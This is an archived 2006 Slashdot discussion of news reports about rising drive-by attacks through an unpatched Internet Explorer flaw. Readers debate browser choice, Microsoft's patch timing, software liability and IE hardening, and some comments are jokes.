Slashdot Log In
Web Site Attacks Against Unpatched IE Flaw Spike
Posted by
Zonk
on Mon Mar 27, 2006 01:29 PM
from the not-a-good-spike dept.
from the not-a-good-spike dept.
An anonymous reader wrote to mention a Washingtonpost.com article about an increase in attacks against IE users via a critical, unpatched flaw. The bug allows software to be downloaded to the vulnerable PC even if the only act the user takes is browsing to a web site. From the article: "[A] password-stealing program landed on the Windows PC belonging to Reaz Chowdhury, a programmer for Oracle Corp. who works out of his home in Orlando, Fla. Chowdhury said he's not sure which site he browsed in the past 24 hours that hijacked his browser, but he confirmed that the attackers had logged the user name and password for his company's virtual private network (VPN)."
Related Stories
[+]
Technology: Trojan Exploits Unpatched IE Flaw 177 comments
onebuttonmouse writes "The Register reports on a trojan spotted in the wild that takes advantage of the so-far unpatched IE vulnerability mentioned on Slashdot earlier this week. From the article: 'The release of a Trojan that exploits an unpatched IE hole has prompted speculation that Microsoft may release an emergency out-of-cycle security patch. Delf-DH downloads other malware onto infected machines changing settings in order to monitor user activity and redirect surfers onto porn sites. The attack relies on a flaw in the way IE handles requests to the window() object.'"
This discussion has been archived.
No new comments can be posted.
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
Full
Abbreviated
Hidden
Loading... please wait.
Lets say it together: (Score:5, Insightful)
Patch released! (Score:5, Funny)
http://www.mozilla.com/firefox/ [mozilla.com]
Legislation Needed? (Score:5, Insightful)
I worked at an air force base and they were definitely standardized on IE. Knowing about these bugs and electing _not_ to fix them expediently, couldn't this be considered a threat to national security?
If there are over 160 million+ computers in the US alone, and 90% of those PC's use Internet Explorer, how can the US Gov. not justify action in insisting these issues be resolved promptly?
Jim http://www.runfatboy.net/ [runfatboy.net] -- Exercise for Web 2.0
Re:Legislation Needed? (Score:5, Interesting)
Parent
Re:Legislation Needed? (Score:3, Insightful)
Re:Legislation Needed? (Score:3, Insightful)
> Internet Explorer, how can the US Gov. not justify action in insisting these issues
> be resolved promptly?
No, how about secure sites take responsibilty for their own incompetence. Both Windows and IE are licensed (and on large sites it really is a license and not a sale) on a general disclaimer of all warranties for suitability to purpose, security, etc. Add in a decade long record of having more remote exploit
Re:Legislation Needed? (Score:4, Interesting)
This means that in closed source, the developers are the "lawyers" who proof-read the "contract". Though, agreeing to a secret contract may not be the best idea (not like I've read the Linux/BSD/* source), but that is another issue.
This means that we have to trust the developer's judgement. In this case, we have to trust that the developers will fix it as soon as possible. If that is legislated then rushing may occur to meet deadlines, possibly leading to more bugs.
I think we should hold companies responsible for errors, where a EULA cannot absolve them from the responsibility provide the services that they promised at the time of purchase, let alone any loss/theft of data. If managers had to factor in "cost of bugs" then I suspect developers would be given more time/resources to fix problems.
Parent
That why I stay with #2 or #3 (Score:5, Interesting)
Not really (Score:3, Informative)
In fact, if MS is successful in creating an OS and set of apps that are more secure than the others, it will mean that Linux, BSD, Mac, and
Re:That why I stay with #2 or #3 (Score:3, Funny)
Re:That why I stay with #2 or #3 (Score:3, Informative)
No, it's not just that people don't go after other browsers quite as much. Most of the time, only Internet Explorer has known highly critical security flaws. From this chart [wikipedia.org] you can see that IE for Windows has had a known highly critical vulnerability for over two years. Currently, the only other browser that has such a serious flaw is Mozilla, and that's been for less than two months — and that
Now that's a solution! (Score:4, Insightful)
Sure I could guess but which ones exactly would those be?
Re:Now that's a solution! (Score:3, Funny)
"... said he's not sure which site he browsed..." (Score:5, Funny)
nope (Score:2)
So, it wasnt pr0n. But c'mon, couldnt he check the history and let others know?
Re:nope (Score:5, Funny)
Parent
Re:"... said he's not sure which site he browsed.. (Score:3, Interesting)
I'm surprised that a programmer would not have the common sense to
disable active scripting for the internet at large, and only enable ActiveX and scripting for Trusted Sites.
And obviously you dont put porn in trusted sites.
As much as I hate to defend MS, (MS Word makes me so incredibly angry), but it seems that a lot of problems with IE are really a result of users who don't take the time to secure it in the options. Sure it
Re:"... said he's not sure which site he browsed.. (Score:5, Insightful)
Hrm, don't blame the victim. Sure, you can turn off active scripting (mainly javascript), but do you know how many sites fail to function properly without it and that is only going to get worse sith the rush to have more interactivity on the client? Think of all the hype around AJAX.
Nah, acripting in browsers (javascript, activeX, flash, showwave, etc) should be properly sandboxed so that they can't access system resources like the file system and execute commands. The problem lies with how IE is developed, not with a user regardless of thier knowledge level.
Parent
*sigh* (Score:2)
I have probably made over $1000 in the past year in $35.00 incriments just running adaware, hijackthis and spybot for people around town, and then recommending firefox. Probably 10 times that amount for my commercial clients.
I used to run them on my box all the time, until I put firefox on... now I run them once a month or so - mainly for giggles and a healthy dose of paranoia. Clean.
When will they learn?
Re:*sigh* (Score:2, Informative)
Also, as a part-time webadmin, I noticed that firefox displays things differently from IE.
Since over 90% of visitors use IE, I have to design the site for IE.
So why don't they program firefox to render pages the same way IE does it?
Re:*sigh* (Score:3, Funny)
I'm just flabbergasted at the thought that I'm not even sure where to begin on a reply. What you are asking...is basically asking them to...break...firefox. I'm all for demolition and breaking stuff just as much as the next guy but that's usually in the name of progress and I see little "progress" in such a proposal.
As lame and well-used as it is: what you're proposing is for the firefox developers to jump off a bridge just becuase
Re:*sigh* (Score:5, Informative)
4 + 2 * 6 evaluates left to right for the basic view, giving the answer 36. The advanced (scientific) view does it by algebraic hierarchy, so the multiplication is done first, giving 16.
(FWIW, the OS X calculator does it the algebraic way, but the calculator widget does it the left to right way)
Parent
Re:*sigh* (Score:4, Interesting)
wow.
you'd think that clicking something under the VIEW menu would, you know, change what you can see. Rather than changing the basic way in which the calculator works.
I still can't believe this.
"Hello, Microsoft Support"
"yeah, I've got a problem with the calculator"
"ok"
"yeah, sometimes when I type an equation in, it gives me one answer, but other times it gives me a different answer"
"oh yes, that's right sir, the calculator gives you different answers depending on which buttons you can see on the screen...."
Parent
In other news... (Score:5, Insightful)
Here we go again.... (Score:4, Informative)
Over on the linux, and alternative browser side, where I live, I see patches coming out very quickly for any kind of exploit.
Sadly, the patch for the new IE flaw is scheduled for April 11th? This is according to a BBC report here:
http://news.bbc.co.uk/2/hi/technology/4849904.stm [bbc.co.uk]
Can't they do better than that? How about an emergency patch, followed by a fully tested one? Just something to knock the vulnerability into non-functional status? Hey, it's fine if the patch is imperfect- I'll beta test to save my banking information. Really.
I suppose I wouldn't have a problem with Microsoft's monopoly if they actually service me as a customer well enough that they deserved a monopoly position. I like a lot of their software. But these kinds of security issues need to be addressed better and faster.
Ironically, I pay a lot less for my linux servers and get better responses for both support and patches. That makes a difference to me.
Serious Question (not flaimbait) (Score:3, Interesting)
If the goal is to infect the most systems, then by defualt, you'd avoid Mozilla or Konqueror simply because (at best) you could only hope to control a fraction of machines with active internet connections. Maybe this question has been asked before...
Re:Serious Question (not flaimbait) (Score:3, Insightful)
What's the general opinion? If the majority of casual surfers used Firefox or other alternative, would reverse engineers switch focus to those apps?
What makes you think the majority don't focus on alternative browsers now? From what I've seen there are about as many people pounding on Firefox as there are on IE. It's just the people who find things in Firefox usually get them fixed much more quickly. Of course if Firefox gains in market share more people will look for holes, but that does not mean it wi
Will IE in Vista be in managed code? (Score:4, Interesting)
Not Helpful In Terms of Security (Score:3, Interesting)
Was the City of Tuttle, Oklahoma... (Score:5, Funny)
Keep an eye on this one.. (Score:5, Informative)
This is a little like the WMF flaw [microsoft.com] that became known just after Christmas. Eventually MS had to provide an out-of-cycle patch (even if it was just a few days early) because of the bad press they were getting. From the looks of things, the patch for this one will be ready soon too.. so any kind of noise you can make to get an early release would be a Good Thing.
Yeah yeah, MS will get a lot of flak from Slashdotters on this, but you should bear in mind that they also provide some decent patching tools like WSUS [microsoft.com] for administrators to roll these things out. Personally, I never use IE on my Windows box, but I'm afraid it's still a fact of life in most large businesses.
Windows is more secure. (Score:2, Insightful)
But this is what we are talking about when we says LESS secure. Anyone running a server in a professional environment is expected to know what he or she is doing. What windows lacks in security has to do with workstations/personal computers at a persons home browsing the web on IE, who is not a security expert and shouldnt need to be! Windows continues t
IE7 beta2 is the solution? Not for 2K users (Score:3, Insightful)
That's nice. Now when is Microsoft going to code IE7 to work on the hundreds of thousands (millions?) of pcs still running Windows 2000?
They're not? You mean I have to shell out more money to get a fix for a problem which is caused by their product?
Just another reason not to go with Vista. Another Mac convert on the way.
easy fix in XP (Score:3, Interesting)
What webserver software is getting commandeered? (Score:5, Insightful)
So, WHAT WEBSERVERS are being hacked into to do this? IIS? Apache 1.3? Apache 2? Windows only? Linux only? Something else? All of the above?
I don't ever use IE for anything, but I do run many websites with a variety of platforms and server software. I'd love to know what it is I'm supposed to be looking for on my servers...
Re:What webserver software is getting commandeered (Score:3, Insightful)
I think it's any webservers whose webmasters use IE. Lemme explain:
1) a dumb webmaster has his PW for his webspace stored in windows
2) dumb webmaster (who should know better) visits a site while using IE, and the site steals his password
3) script or person uses the password to login to the webspace, add in malicious code, and the cycle continues
And the bottom line is ... (Score:3, Funny)
BEATS HEAD SLOWLY AGAINST BRICK WALL.
THIS IS UNSATISFACTORY.
GOES OUT AND FINDS granite WALL.
BEATS HEAD AGAINST IT.
MUCH BETTER!
Re:linking=vouching for (Score:2, Insightful)
Re:linking=vouching for (Score:5, Informative)
More than 200 Web sites -- many of them belonging to legitimate businesses -- have been hacked and seeded with code that tries to take advantage of a unpatched security hole in Microsoft's Internet Explorer Web browser to install hostile code on Windows computers when users merely visit the sites.
Parent
Re:linking=vouching for (Score:2)
So how do these sites get hits? Are they Good sites that have just been compromised?
The most common scenario right now is a server is hacked, then e-mails and IMs are sent out with links to it. I don't know of any really popular sites that have been hacked to include this.
Re:Ugh (Score:3, Funny)
Ugh (Score:5, Funny)
Parent
Re:Ugh (Score:5, Funny)
Parent
Re:Ugh (Score:5, Funny)
Parent
Re:Ugh (Score:3, Funny)
Godwin explodes. Details at 11.
~W
Re:Ugh (Score:5, Informative)
"Website Attacks Against Unpatched IE Flaw Spike"
Actually, this would be even clearer if you put the verb before the prepositional phrase:
"Website Attacks Spike Against Unpatched IE Flaw"
It's unclear because both "spike" and "flaw" can be verbs or nouns, and the broken "unpatch" disrupts our ability to smoothly interpret the rest of the sentence thanks to turning an adjective into a present tense verb.
(I know I'm not perfect by a long shot on spelling and grammar, but it's not my job to post legibly on Slashdot.)
Parent
Re:Ugh (Score:2)
Re:Yep... (Score:2)
Re:This is becomming not funny (Score:3, Funny)
Re:a programmer for Oracle Corp (Score:3, Funny)
I doubt he talked to his boss before blabbing that one.